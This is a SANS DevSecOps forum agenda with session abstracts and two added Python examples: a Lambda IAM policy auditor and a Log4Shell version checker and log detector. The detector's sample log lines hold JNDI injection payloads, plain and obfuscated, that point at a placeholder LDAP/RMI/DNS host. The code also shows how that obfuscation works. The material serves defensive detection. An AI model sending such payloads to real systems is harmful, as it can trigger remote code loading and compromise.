DevSecOps and Application Threat Landscape Solutions Forum 2022

Over the past few years, we have seen drastic, but welcome, changes in how organizations manage their own software and code. Organizations are embracing security at the code level, encouraging developers and security teams to work closely together. This shift, which gave rise to the term "DevSecOps", has developers integrating automated processes that build, test and ship code, streamlining the development cycle and delivering code more securely.

However, cyber adversaries have been watching these changes as well. Over the same period, we have seen an increase in adversaries targeting code repositories, software supply chains and software update cycles. The convergence of these trends means that organizations must be more cognizant of the threats to their development cycles and of how to defend against them.

Stay up to date on upcoming Summits & Forums and get connected with thousands of industry professionals by joining the 2022 Solutions Forums Workspace & Mailing List!

Sponsor

Contrast Security

Agenda | January 11, 2022 | 10:30 AM - 4:00 PM EST

10:30 AM

Welcome & Opening Remarks

Matt Bromiley, SANS Certified Instructor

Jeff Williams, Co-Founder and CTO, Contrast Security

10:45 AM

Developing and Deploying Secure Code with AWS Lambda

As serverless applications gain traction, new pain points have emerged, such as overly permissive function permissions. Gaining an overall understanding of a serverless application is difficult given the abstraction of infrastructure, network and virtual machines, which makes it hard for traditional application security tools to deliver accurate results.

This session examines some unique challenges when securing serverless applications including:

  • A broad attack surface: every function, API and protocol presents a potential attack vector.
  • A porous perimeter: serverless applications have more fragmented boundaries.
  • Increased complexity around permissions and access.

Join to learn how to:

  • Find and fix overly permissive AWS Lambda functions with ease.
  • Uncover vulnerabilities in your custom code and open source packages.
  • Gain a holistic view of your AWS Lambda application, including all functions and related components.
  • Make it easy for developers to build applications rapidly while reducing risk.

Tal Melamed, Sr Director Cloud Native Security Research, Contrast Security
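The first takeaway, finding overly permissive functions, comes down to reading the execution role's policy documents and looking for grants a single function should never hold. The following Python is an added illustration, not code from Contrast Security or from the talk: both policy documents are constructed, the function names and the account id 123456789012 are placeholders, and the checks are heuristics over the policy JSON rather than a full IAM evaluator (no NotAction, no permission boundaries, no policy merging).

```python
import json

# Constructed example: the kind of execution-role policy a serverless function
# accumulates when "just make it work" wins. Not from any real account.
OVERLY_PERMISSIVE = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Effect": "Allow", "Action": ["s3:*", "dynamodb:*"], "Resource": "*"}
  ]
}
""")

# Constructed example: the same function's needs, scoped to named resources.
# 123456789012 is the AWS documentation placeholder account id.
LEAST_PRIVILEGE = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"],
     "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/order-handler:*"},
    {"Effect": "Allow",
     "Action": ["s3:GetObject"],
     "Resource": "arn:aws:s3:::order-uploads-example/*"},
    {"Effect": "Allow",
     "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
     "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/orders"}
  ]
}
""")


def _as_list(value):
    """IAM accepts either a string or a list for Action and Resource."""
    return value if isinstance(value, list) else [value]


def policy_findings(policy):
    """Return (statement_index, reason) pairs for Allow statements that grant
    more than one function should hold. Heuristics only: a full evaluator
    would also handle NotAction, NotResource and Deny statements."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        for action in actions:
            if action == "*":
                findings.append((i, "Action '*' grants every API of every service"))
            elif action.endswith(":*"):
                findings.append((i, f"Action '{action}' grants every API of that service"))
        # A bare wildcard resource with no Condition reaches every resource in
        # the account; a Condition (e.g. on a tag or VPC) at least narrows it.
        if "*" in resources and not stmt.get("Condition"):
            findings.append((i, "Resource '*' with no Condition applies account-wide"))
    return findings


def audit_functions(functions):
    """functions: {function_name: [policy_document, ...]}, i.e. the managed and
    inline policies attached to each function's execution role. Returns only
    the functions that have findings, so an empty dict means nothing to fix."""
    report = {}
    for name, policies in functions.items():
        found = [f for policy in policies for f in policy_findings(policy)]
        if found:
            report[name] = found
    return report


# Constructed inventory: two hypothetical functions and their role policies.
EXAMPLE_FUNCTIONS = {
    "image-resizer": [OVERLY_PERMISSIVE],
    "order-handler": [LEAST_PRIVILEGE],
}

if __name__ == "__main__":
    for name, findings in audit_functions(EXAMPLE_FUNCTIONS).items():
        print(name)
        for idx, reason in findings:
            print(f"  statement[{idx}]: {reason}")
```

In practice the policy documents come from the role named in each function's configuration (the Role field), and the same checks apply to the function's resource-based policy, which governs who may invoke it.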

11:45 AM

Help to Self-Help: How Developers Can Test Their Code Without Being Security Experts

What can developers do to get more assurance that they are not introducing new vulnerabilities when they release and deploy code? Furthermore, can developers test their code without being a penetration tester or cyber security expert?

In this talk, Chris Dale will introduce the methodologies penetration testers use when trying to discover the full scope of an application and hunt for vulnerabilities. These methodologies have several practical areas where developers can do their own testing, helping them produce higher-quality code with fewer bugs and vulnerabilities.

Chris Dale, SANS Certified Instructor

12:15 PM

What Next-Gen Pentesting Looks Like When Combined with IAST

There is simply not enough time or resources to pentest all the applications and APIs being built with Agile and DevOps, particularly when release cycles are daily or even faster.

Discover what next-generation pentesting looks like when combined with interactive application security testing (IAST). Attendees will learn:

  • Why pentesting shouldn’t compete with other AppSec testing tools and waste time with things already thoroughly tested
  • How pentesting should be combined with security instrumentation for tracking data flows, control flows, backend connections, etc.
  • How pentesting can be adapted to modern application complexities such as APIs, microservices, etc.
  • How pentesters can deliver deeper and more contextual findings to development teams

Jeff Williams, Co-Founder and CTO, Contrast Security

1:00 PM

A "Fireside" Chat on Next-Gen Pentesting

Immediately following his presentation on Next-Gen Pentesting Combined with IAST, Jeff sits down with our forum moderator, Matt Bromiley, to continue the discussion of next-gen pentesting. Pulling from the day's presentations and audience questions, we'll examine how the landscape has changed and what the future holds for pentesters and security teams. Join us for this interactive session, and bring your questions as we'll be monitoring and responding to the chat room live.

Jeff Williams, Co-Founder and CTO, Contrast Security

Matt Bromiley, SANS Senior Instructor

1:45 PM

Break

1:55 PM

Cybersecurity Detection and Response in DevSecOps

The full-lifecycle objective of DevSecOps is to deploy systems that are operationally effective and that support detection and intervention with minimal human interaction. That requires effective detection engineering within the development effort. Detection engineering is typically driven by hunting in production deployments, after the fact, but it should be incorporated into development to ensure observability and to focus on the likely attack vectors and weaknesses of the deployed systems.

Expect automation and orchestration to be used in production deployments to balance security objectives against scarce operational resources; when people do intervene to adjudicate complicated situations under time pressure and with incomplete information, they need the right understanding and data. Building cloud deployments, custom applications and serverless workloads with observability in mind improves visibility, issue detection and intervention opportunities.

Listen to Christopher Crowley's synopsis of what this looks like in your DevSecOps program, how to prepare your staff to think in this fashion, and how to align the technology and processes necessary to perform at this level.

Chris Crowley, SANS Senior Instructor

2:30 PM

How to Win the DevSecOps Transformation Race

World-class application security programs were not built in a day. The journey to success, and to meeting the new normal of code velocity, requires a coordinated effort between Engineering, DevOps and Security. Hear from Larry Maccherone, DevSecOps transformation leader, on how to quickly align goals and incentives and remove friction in securing code across the entire SDLC. Takeaways from this session will be:

  • Recent trends in application security programs
  • Stories and advice on taking your program from zero to production and securing application development at the pace of tomorrow
  • KPIs to measure program success
  • Developer empowerment and ways to truly enable developers to ship more secure code without getting in their way

Larry Maccherone, Sr Director, DevSecOps Transformation, Contrast Security

3:15 PM

Is Your Web Application Exploitable By Log4Shell Vulnerability?

In the weeks since the Log4Shell vulnerability rocked the Internet, there have been numerous lessons learned. While there is no doubt that defenders will be dealing with vulnerable applications (while pen testers and threat actors target them) for years to come, we can begin implementing lessons immediately. There is little doubt that sooner or later there will be another vulnerability of this magnitude in a widely used library like log4j. Those who have acted to deploy appropriate solutions will no doubt benefit from their diligence and forward thinking. But at the same time they will still be addressing the multitude of vulnerable log4j instances that vendors never disclosed and that vulnerability scanning missed.

Join me as I take a deep dive into:

  • Software Composition Analysis (SCA) tools
  • Threat intelligence for early warning and situational awareness
  • Network segmentation to limit the blast radius of a successful exploitation
  • Zero Trust Networking to limit exploitation vectors
  • Vulnerability management solutions to scan for vulnerable applications
  • Network Detection and Response (NDR) to identify exploitation and post-exploitation activity

Jake Williams, SANS Senior Instructor
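Two of the bullets above, software composition analysis and network detection, lend themselves to a worked example. The following Python is an added illustration, not code from the talk or from SANS: the dependency list and the access-log lines in it are constructed. The version thresholds are facts supplied here, not taken from the page, which names no versions: they are the releases that closed Apache's December 2021 fix series for the lookup issues (2.17.0 for Java 8+, 2.12.3 for Java 7, 2.3.1 for Java 6); confirm them against the Apache Log4j security page before relying on them, and note that the later 2.17.1/2.12.4/2.3.2 releases address a separate, configuration-dependent issue that this check does not cover.

```python
import re

# --- Software composition: is this log4j-core version still exposed? --------

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(-[\w.]+)?$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0). The last element
    orders a pre-release below the matching final release. Early 2.0 betas that
    predate the JNDI lookup are treated conservatively as exposed."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


# First release of each maintained 2.x branch that closed the December 2021
# lookup fix series (assumed thresholds: Java 8+ 2.17.0, Java 7 2.12.3,
# Java 6 2.3.1). Verify against Apache's security page before relying on them.
_FIXED_BY_BRANCH = {(2, 3): (2, 3, 1, 1), (2, 12): (2, 12, 3, 1)}
_FIXED_DEFAULT = (2, 17, 0, 1)


def log4j_core_exposed(version):
    """True if this log4j-core version predates the fixed release of its branch.
    1.x is end-of-life and outside this check: it lacks the JNDI lookup but
    needs its own handling."""
    v = parse_version(version)
    if v[0] != 2:
        return False
    return v < _FIXED_BY_BRANCH.get(v[:2], _FIXED_DEFAULT)


def scan_components(components):
    """components: iterable of (group, artifact, version) as read from an SBOM
    or dependency tree. Only log4j-core carries the vulnerable lookup; the
    log4j-api jar on its own does not."""
    return [(g, a, v) for g, a, v in components
            if g == "org.apache.logging.log4j" and a == "log4j-core"
            and log4j_core_exposed(v)]


# --- Network/log detection: JNDI lookup strings, including obfuscation ------

_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text):
    """Collapse the nested lookups attackers use to hide the word 'jndi':
    ${lower:J} -> j, ${upper:j} -> J, ${::-j} and ${env:NOPE:-j} -> j.
    Innermost lookups resolve first; repeat until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE.sub(lambda m: m.group(2).lower()
                         if m.group(1).lower() == "lower" else m.group(2).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def is_jndi_probe(line):
    return bool(_JNDI.search(normalize_lookups(line)))


def find_probes(log_lines):
    """Return (line_number, normalized_line) for every request carrying a JNDI
    lookup, the check an NDR sensor or WAF rule would apply to decoded headers."""
    return [(n, normalize_lookups(line))
            for n, line in enumerate(log_lines, 1) if is_jndi_probe(line)]


# Constructed inventory, as one might pull from a Maven dependency tree.
SAMPLE_COMPONENTS = [
    ("org.apache.logging.log4j", "log4j-core", "2.14.1"),   # original Log4Shell range
    ("org.apache.logging.log4j", "log4j-core", "2.15.0"),   # first fix, still incomplete
    ("org.apache.logging.log4j", "log4j-core", "2.12.2"),   # Java 7 line, before its final fix
    ("org.apache.logging.log4j", "log4j-core", "2.17.0"),
    ("org.apache.logging.log4j", "log4j-api", "2.14.1"),    # API jar alone is not exposed
    ("ch.qos.logback", "logback-classic", "1.2.10"),
]

# Constructed access-log lines; 198.51.100.0/24 is a documentation range.
# The User-Agent is the classic carrier, but any logged header or parameter counts.
SAMPLE_ACCESS_LOG = [
    '198.51.100.20 - - [11/Jan/2022:10:45:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [11/Jan/2022:10:45:02 +0000] "GET / HTTP/1.1" 200 1043 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [11/Jan/2022:10:45:03 +0000] "GET / HTTP/1.1" 200 1043 "-" "${${lower:j}${lower:n}${lower:d}i:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [11/Jan/2022:10:45:04 +0000] "GET / HTTP/1.1" 200 1043 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/a}"',
    '198.51.100.24 - - [11/Jan/2022:10:45:05 +0000] "GET / HTTP/1.1" 200 1043 "-" "${${env:NOPE:-j}${upper:n}di:dns://198.51.100.7/a}"',
]

if __name__ == "__main__":
    for g, a, v in scan_components(SAMPLE_COMPONENTS):
        print(f"exposed: {g}:{a}:{v}")
    for n, line in find_probes(SAMPLE_ACCESS_LOG):
        print(f"probe on line {n}: {line}")
```

The version check answers the SCA question only for the copies of log4j-core you can enumerate; the shaded and repackaged copies inside vendor products, which the abstract warns about, need a file-content scan rather than a manifest check. The log check catches the common obfuscations but not every lookup type, so it belongs alongside egress controls that deny outbound LDAP, RMI and DNS from application hosts.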

3:45 PM

Wrap-Up

Matt Bromiley, SANS Senior Instructor